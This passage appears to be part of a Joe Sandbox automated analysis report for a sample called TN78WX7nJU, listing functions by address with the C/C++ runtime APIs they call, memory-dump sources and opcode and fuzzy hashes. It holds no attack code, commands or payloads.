                                                                                                                                                                                                                                                                  • Part of subcall function 0248BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0248BFEE
                                                                                                                                                                                                                                                                • std::locale::_Getfacet.LIBCPMT ref: 02484FEA
                                                                                                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 0248501B
                                                                                                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 02485031
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0248504F
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2243866535-0
                                                                                                                                                                                                                                                                • Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                                                                                                                                                                                                                                • Instruction ID: 5c43502c7d1c2b6603fea09ba7882039da7b2105ff86d9db859e625ce53303c6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E311C2319202289BCB25FB65D800AEE77B2BF05314F55051FE816AB2D0DF749A06CFD0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00404D63
                                                                                                                                                                                                                                                                • int.LIBCPMT ref: 00404D7A
                                                                                                                                                                                                                                                                  • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                                                                                                                                                                                  • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                                                                                                                                                                                • std::locale::_Getfacet.LIBCPMT ref: 00404D83
                                                                                                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 00404DB4
                                                                                                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00404DCA
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00404DE8
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2243866535-0
                                                                                                                                                                                                                                                                • Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                                                                                                                                                                                                                                • Instruction ID: 50d9ff0d4b57cf36d5715a51c78873cd43da78958b4b2dc720108d245924cf68
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB11A0B2D101299BCB15EBA4C841AAE77B0AF44318F14457FE911BB2D2DB3C9A058BDD
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0248C401
                                                                                                                                                                                                                                                                • int.LIBCPMT ref: 0248C418
                                                                                                                                                                                                                                                                  • Part of subcall function 0248BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0248BFD4
                                                                                                                                                                                                                                                                  • Part of subcall function 0248BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0248BFEE
                                                                                                                                                                                                                                                                • std::locale::_Getfacet.LIBCPMT ref: 0248C421
                                                                                                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 0248C452
                                                                                                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0248C468
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0248C486
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2243866535-0
                                                                                                                                                                                                                                                                • Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                                                                                                                                                                                                                                • Instruction ID: 080d1e1ab3d2e7bfcfc859a30103bf800f74dfddc59c058dfe66ee1bff4fa622
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4411E5719102289BCF19FB65C844AFD7776AF40714F10051FE811BB290DF748A41CFA0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 02484E8C
                                                                                                                                                                                                                                                                • int.LIBCPMT ref: 02484EA3
                                                                                                                                                                                                                                                                  • Part of subcall function 0248BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0248BFD4
                                                                                                                                                                                                                                                                  • Part of subcall function 0248BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0248BFEE
                                                                                                                                                                                                                                                                • std::locale::_Getfacet.LIBCPMT ref: 02484EAC
                                                                                                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 02484EDD
                                                                                                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 02484EF3
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 02484F11
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2243866535-0
                                                                                                                                                                                                                                                                • Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                                                                                                                                                                                                                • Instruction ID: c9fed2677125e939422074f424157d3a327a9436136dc500938c97e5e74ffdec
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA11CE329102299BCF15FBA5D800AEE77B2AF44314F14051FE911B7290EF749A01CF90
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040C19A
                                                                                                                                                                                                                                                                • int.LIBCPMT ref: 0040C1B1
                                                                                                                                                                                                                                                                  • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                                                                                                                                                                                  • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                                                                                                                                                                                • std::locale::_Getfacet.LIBCPMT ref: 0040C1BA
                                                                                                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 0040C1EB
                                                                                                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0040C201
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C21F
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2243866535-0
                                                                                                                                                                                                                                                                • Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                                                                                                                                                                                                                                • Instruction ID: ee53003dfc9470fa79d8cc5ab50186f75a1860792542933f5f9c6443a3e70220
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B2119172900219EBCB15EB90C881AAD7760AF44314F14053FE811BB2D2DB389A059B99
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 004054E3
                                                                                                                                                                                                                                                                • int.LIBCPMT ref: 004054FA
                                                                                                                                                                                                                                                                  • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                                                                                                                                                                                  • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                                                                                                                                                                                • std::locale::_Getfacet.LIBCPMT ref: 00405503
                                                                                                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 00405534
                                                                                                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0040554A
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00405568
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2243866535-0
                                                                                                                                                                                                                                                                • Opcode ID: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
                                                                                                                                                                                                                                                                • Instruction ID: 21a092b80c120d3a1799ad65edf81cfe58c90a4d0a542ae4cd53e0a409a0227e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A711AC72D10628ABCB15EBA4C801AAE7774EF44318F14053EE811BB2D2DB389A058F9C
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040557F
                                                                                                                                                                                                                                                                • int.LIBCPMT ref: 00405596
                                                                                                                                                                                                                                                                  • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                                                                                                                                                                                  • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                                                                                                                                                                                • std::locale::_Getfacet.LIBCPMT ref: 0040559F
                                                                                                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 004055D0
                                                                                                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 004055E6
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00405604
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2243866535-0
                                                                                                                                                                                                                                                                • Opcode ID: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
                                                                                                                                                                                                                                                                • Instruction ID: 21547056dedd0a357f918a94d9d64b27cd1eadba8e4608574907870a271d474c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D119E72900628EBCB15EBA5C841AEEB370EF04314F14453FE811BB2D2DB789A058B9C
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00404C25
                                                                                                                                                                                                                                                                • int.LIBCPMT ref: 00404C3C
                                                                                                                                                                                                                                                                  • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                                                                                                                                                                                  • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                                                                                                                                                                                • std::locale::_Getfacet.LIBCPMT ref: 00404C45
                                                                                                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 00404C76
                                                                                                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00404C8C
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00404CAA
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2243866535-0
                                                                                                                                                                                                                                                                • Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                                                                                                                                                                                                                • Instruction ID: 1aa241efc112286da59c73bb00310cdec327cb4216d8ea75c5d160ea2c1741d7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5311E0B2C002289BCB11EBA0C801AEE7774AF44318F10053FE911BB2D1CB389E058B98
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00404E6A
                                                                                                                                                                                                                                                                  • Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E
                                                                                                                                                                                                                                                                • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EB5
                                                                                                                                                                                                                                                                • __Getcoll.LIBCPMT ref: 00404EC4
                                                                                                                                                                                                                                                                • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404ED4
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                                                                                                                                                                                • String ID: fJ@
                                                                                                                                                                                                                                                                • API String ID: 1836011271-3478227103
                                                                                                                                                                                                                                                                • Opcode ID: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
                                                                                                                                                                                                                                                                • Instruction ID: b09a35a98a06b47a9133a0f6fd6c3c5fe655fd81b24a3011873ef7005f6a19eb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 160157719002089FDB00EFA5C481B9EB7B0BF80318F10857EE045AB6C1CB789A84CB99
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002), ref: 0042FF04
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF17
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000), ref: 0042FF3A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                • Opcode ID: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
                                                                                                                                                                                                                                                                • Instruction ID: 2c645cf7ccd09daad3cc37133732e5cb7e12e7ad02a2fd82027b287817b89b2c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00F0C830A10218BBDB109F90DD09B9EFFB4EF05B12F5100B6F805A2290CB799E44CB9C
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE21
                                                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE45
                                                                                                                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE58
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0041CE66
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                • String ID: pScheduler
                                                                                                                                                                                                                                                                • API String ID: 3657713681-923244539
                                                                                                                                                                                                                                                                • Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                                                                                                                                                                                                                                • Instruction ID: 55b545704ffbdb88c77e4cd2f194ab5b8344582a808f7ff6d102e262485e3fbf
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7FF05935940714A7C714EA05DC82CDEB3799E90B18760822FE40963282DF3CA98AC29D
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: H_prolog3_catchmake_shared
                                                                                                                                                                                                                                                                • String ID: MOC$RCC$v)D
                                                                                                                                                                                                                                                                • API String ID: 3472968176-3108830043
                                                                                                                                                                                                                                                                • Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                                                                                                                                                                                                                                • Instruction ID: d89199b3ae4fef76cffa81a27c3a1dc02c5c22ed7ca3ae60add89021205471e6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1AF04FB5A00614DFDF5AFF69C41076D3B69BF22B04F5A909BF4405B2A0CB785988CFA1
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                                                                                                                                                                                                                                • Instruction ID: b27f609adf0015fc56f8b9ea66ec14800685be707f0b7ec8525cc07e8f04d9f6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC71D271900216DBDB21CF99C8A4ABFBBB5FF7532CF54422BE41157280DB718982CBA0
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
                                                                                                                                                                                                                                                                • Instruction ID: bf4f81b698e6ff7fb3fc7778d7bd366b6aaf8ee244f588ee8458200c33ffab4c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E7719D31A00366DBCB21CF95E884ABFBB75FF45360F98426AE81097290D7789D41C7E9
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _free$AllocateHeap
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3033488037-0
                                                                                                                                                                                                                                                                • Opcode ID: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                                                                                                                                                                                                                                • Instruction ID: 3d5ce12d85e78b1ec7b6ee11579a03264736c9aab66c48f996b3922d2aa94c6f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 51519331A003049FDB229F2AD841BAB77F9EF48725F14556EE809D7290E731E901CBA0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00430B4F
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00430B66
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00430B85
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00430BA0
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00430BB7
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _free$AllocateHeap
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3033488037-0
                                                                                                                                                                                                                                                                • Opcode ID: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
                                                                                                                                                                                                                                                                • Instruction ID: f55d0931b52299485a7a2c2bc17b7062c97d80267fd2ec389340ea5f3bc65001
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1B51E171A00304AFEB21AF69D851B6BB7F5EF5C724F14166EE809D7250E739E9018B88
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _free
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                                                                                                                                • Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                                                                                                                                                                                                                • Instruction ID: 24c77b10373240b01ca32d40b18eb60aebc2178b60da524a0c763016ee606016
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8241DE36A002049FCB21DF79C890A9EB7E6EF88714B1545AAE909EB381D731E901CB90
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
